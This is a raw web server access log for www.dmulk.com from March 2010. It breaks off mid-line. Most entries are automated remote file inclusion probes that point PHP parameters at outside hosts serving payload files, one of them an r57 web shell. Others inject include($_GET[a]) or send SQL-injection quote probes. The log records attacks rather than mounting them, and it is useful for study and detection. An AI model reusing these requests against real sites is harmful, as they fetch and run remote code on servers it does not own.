211.43.212.49 - - [12/Mar/2010:10:26:37 -0800] "GET /logs/access_091023.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:26:37 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://art-investments.eu/id1???? HTTP/1.1" 200 7352 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:26:37 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:10:26:38 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://art-investments.eu/id1???? HTTP/1.1" 200 7352 "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:26:51 -0800] "GET /logs/access_080113.log/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:26:59 -0800] "GET /logs/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:26:59 -0800] "GET /errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:26:59 -0800] "GET /logs/access_071223.log/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
69.64.43.97 - - [12/Mar/2010:10:27:10 -0800] "GET /logs/access_080113.log/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
89.122.29.81 - - [12/Mar/2010:10:27:14 -0800] "GET / HTTP/1.1" 200 15041 "-" "Java/1.6.0_04" "www.dmulk.com"
69.64.43.97 - - [12/Mar/2010:10:27:15 -0800] "GET /errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
69.64.43.97 - - [12/Mar/2010:10:27:15 -0800] "GET /logs/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
69.64.43.97 - - [12/Mar/2010:10:27:15 -0800] "GET /logs/access_071223.log/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
89.122.29.81 - - [12/Mar/2010:10:27:16 -0800] "GET /http%3A%2F%2Fdmulk.com%2Fblog%2Findex.php%3Fslideshow%3Dtrue%26gid%3D20 HTTP/1.1" 404 - "-" "Java/1.6.0_04" "www.dmulk.com"
87.106.132.3 - - [12/Mar/2010:10:27:31 -0800] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
87.106.132.3 - - [12/Mar/2010:10:27:32 -0800] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
87.106.132.3 - - [12/Mar/2010:10:27:32 -0800] "GET /logs/access_090911.log%20%20/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:27:40 -0800] "GET /logs/access_090203.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:27:40 -0800] "GET /logs/access_090625.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:27:40 -0800] "GET /logs/access_100228.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:27:40 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:27:41 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 200 15075 "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:27:48 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:27:48 -0800] "GET /logs/access_090625.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:27:48 -0800] "GET /logs/access_100228.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:10:27:48 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 200 15075 "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:27:52 -0800] "GET /logs/access_080215.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:27:54 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:27:54 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:27:54 -0800] "GET /logs/access_080701.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
87.106.132.3 - - [12/Mar/2010:10:27:56 -0800] "GET /logs/access_090113.log%20%20/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:28:03 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:28:03 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:28:03 -0800] "GET /logs/access_090428.log//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.114.222.95 - - [12/Mar/2010:10:28:15 -0800] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.114.222.95 - - [12/Mar/2010:10:28:15 -0800] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.114.222.95 - - [12/Mar/2010:10:28:15 -0800] "GET /logs/access_090911.log%20%20/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.250.124.252 - - [12/Mar/2010:10:28:30 -0800] "GET /logs/access_090820.log//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:28:32 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:28:32 -0800] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:28:33 -0800] "GET /logs/access_090516.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:28:59 -0800] "GET /logs/access_080113.log/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.114.222.95 - - [12/Mar/2010:10:29:03 -0800] "GET /logs/access_090113.log%20%20/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:10:29:14 -0800] "GET /logs/access_090718.log/index2.php?lang=' HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:29:19 -0800] "GET /logs/access_090428.log//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:10:29:20 -0800] "GET /index2.php?lang=' HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
122.201.82.173 - - [12/Mar/2010:10:29:21 -0800] "GET /logs/index2.php?lang=' HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:29:33 -0800] "GET /logs/access_071223.log/errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:29:33 -0800] "GET /logs/errors.php?error=http://art-investments.eu/id1???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "dmulk.com"
79.170.45.30 - - [12/Mar/2010:10:29:33 -0800] "GET /errors.php?error=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
58.230.162.220 - - [12/Mar/2010:10:29:35 -0800] "GET /logs/access_090820.log//modules/vwar/admin/admin.php?vwar_root=http://www.espace-poker.com/cok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:10:29:52 -0800] "GET /logs/access_080215.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:29:59 -0800] "GET /logs/access_080929.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.63.82.14 - - [12/Mar/2010:10:30:08 -0800] "GET /logs/access_080216.log%20%20//popup_window.php?site_isp_root=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.58.155.176 - - [12/Mar/2010:10:30:09 -0800] "GET /logs/access_080215.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.63.82.14 - - [12/Mar/2010:10:30:13 -0800] "GET /logs/access_090424.log%20%20//popup_window.php?site_isp_root=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.63.82.14 - - [12/Mar/2010:10:30:16 -0800] "GET /logs/access_080216.log%20%20//popup_window.php?site_isp_root=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.63.82.14 - - [12/Mar/2010:10:30:16 -0800] "GET /logs/access_090424.log%20%20//popup_window.php?site_isp_root=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.120 - - [12/Mar/2010:10:30:25 -0800] "GET /logs/access_090508.log%20%20/index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.120 - - [12/Mar/2010:10:30:26 -0800] "GET /logs/index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.120 - - [12/Mar/2010:10:30:26 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 200 15061 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:30:29 -0800] "GET /logs/access_090516.log%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.197.232.13 - - [12/Mar/2010:10:30:31 -0800] "GET /logs/access_080215.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.paradisftp.pl/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.120 - - [12/Mar/2010:10:31:06 -0800] "GET /logs/access_100228.log%20%20/index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:31:13 -0800] "GET /logs/access_090502.log%20%20//playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:31:13 -0800] "GET /logs//playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:31:14 -0800] "GET /playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:31:17 -0800] "GET /logs//playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:31:17 -0800] "GET /playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:31:17 -0800] "GET /logs/access_090502.log//playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.47.237.17 - - [12/Mar/2010:10:31:23 -0800] "GET /logs/access_090203.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:31:40 -0800] "GET /logs/access_090321.log%20%20//playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:31:46 -0800] "GET /logs/access_090321.log//playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
187.64.98.149 - - [12/Mar/2010:10:31:49 -0800] "GET /logs/access_090321.log/index.php?p=http://www.5njr.com/shells/r57.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
187.64.98.149 - - [12/Mar/2010:10:31:50 -0800] "GET /index.php?p=http://www.5njr.com/shells/r57.txt?? HTTP/1.1" 200 14971 "-" "libwww-perl/5.831" "www.dmulk.com"
187.64.98.149 - - [12/Mar/2010:10:31:51 -0800] "GET /logs/index.php?p=http://www.5njr.com/shells/r57.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:10:31:55 -0800] "GET /logs/access_080531.log%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:32:12 -0800] "GET /logs/access_091101.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:32:12 -0800] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:32:12 -0800] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:32:31 -0800] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:32:31 -0800] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:32:31 -0800] "GET /logs/access_091101.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:32:32 -0800] "GET /logs/access_080310.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:32:32 -0800] "GET /logs/access_100110.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
87.106.132.3 - - [12/Mar/2010:10:32:40 -0800] "GET /logs/access_090911.log/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:32:51 -0800] "GET /logs/access_080310.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:32:52 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:32:52 -0800] "GET /logs/access_090711.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:32:53 -0800] "GET /logs/access_090928.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:32:53 -0800] "GET /logs/access_090826.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:32:53 -0800] "GET /logs/access_080222.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
87.106.132.3 - - [12/Mar/2010:10:32:54 -0800] "GET /logs/access_090113.log/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
87.106.132.3 - - [12/Mar/2010:10:32:55 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
87.106.132.3 - - [12/Mar/2010:10:32:55 -0800] "GET /logs/scriptsold.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
87.106.132.3 - - [12/Mar/2010:10:32:55 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:33:04 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:33:04 -0800] "GET /logs/access_081007.log//bbs//skin/zero_vote/ask_password.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.239 - - [12/Mar/2010:10:33:05 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
187.64.98.149 - - [12/Mar/2010:10:33:06 -0800] "GET /logs/access_080211.log/index.php?p=http://www.5njr.com/shells/r57.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:33:07 -0800] "GET /logs//bz/squito/photolist.inc.php?photoroot=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:33:07 -0800] "GET /logs/access_091210.log%20%20//bz/squito/photolist.inc.php?photoroot=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:33:07 -0800] "GET /bz/squito/photolist.inc.php?photoroot=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:33:10 -0800] "GET /logs/access_091210.log//bz/squito/photolist.inc.php?photoroot=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:33:10 -0800] "GET /logs//bz/squito/photolist.inc.php?photoroot=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:33:10 -0800] "GET /bz/squito/photolist.inc.php?photoroot=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:33:11 -0800] "GET /logs/access_100110.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:33:11 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:33:11 -0800] "GET /logs/access_090711.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:33:11 -0800] "GET /logs/access_090826.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:33:21 -0800] "GET /logs/access_080728.log%20%20//bz/squito/photolist.inc.php?photoroot=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:10:33:23 -0800] "GET /logs/access_080728.log//bz/squito/photolist.inc.php?photoroot=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:33:31 -0800] "GET /logs/access_090928.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://fcg.com.pl/www/system2/tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.240.234.44 - - [12/Mar/2010:10:33:31 -0800] "GET /